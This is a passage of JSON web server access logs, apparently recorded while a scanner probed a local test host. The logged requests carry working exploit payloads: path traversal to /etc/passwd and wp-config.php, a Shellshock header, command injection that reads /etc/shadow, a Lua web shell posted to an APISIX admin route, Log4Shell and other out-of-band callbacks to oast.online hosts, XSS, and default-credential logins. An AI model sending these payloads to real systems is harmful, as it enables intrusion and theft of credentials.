+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///etc/passwd\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/297MFiybxuzp5z7X7vXQz7NwoSV\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x22297MFltGlPSFlrQ9uVLN6bCQHED.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../297MFjaLsGoJvqgnQxyEt4sEmCh.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///c://windows/win.ini\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x22username\x22: \x22testpoc\x22, \x22has_admin_role\x22: true, \x22password\x22: \x22TestPoc!\x22, \x22email\x22: \x22testpoc@example.com\x22, \x22realname\x22: \x22poc\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://c9v8gc8smpv8b0ng0t003p5qmu5gaiqyz.oast.online') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/media/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27297MFjY4jjGYxpp16dUApjC4t0r%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /echo-server.html?code=test&state=http://www.attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFiybxuzp5z7X7vXQz7NwoSV?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFjaLsGoJvqgnQxyEt4sEmCh.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x22userName\x22:\x22admin\x22,\x22password\x22:\x22cs141-snmp\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://c9v8gc8smpv8b0ng0t00hbtkpcamgabpw.oast.online%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c9v8gc8smpv8b0ng0t00j5qu8iy7heo3f.oast.online/a%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authentication/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", 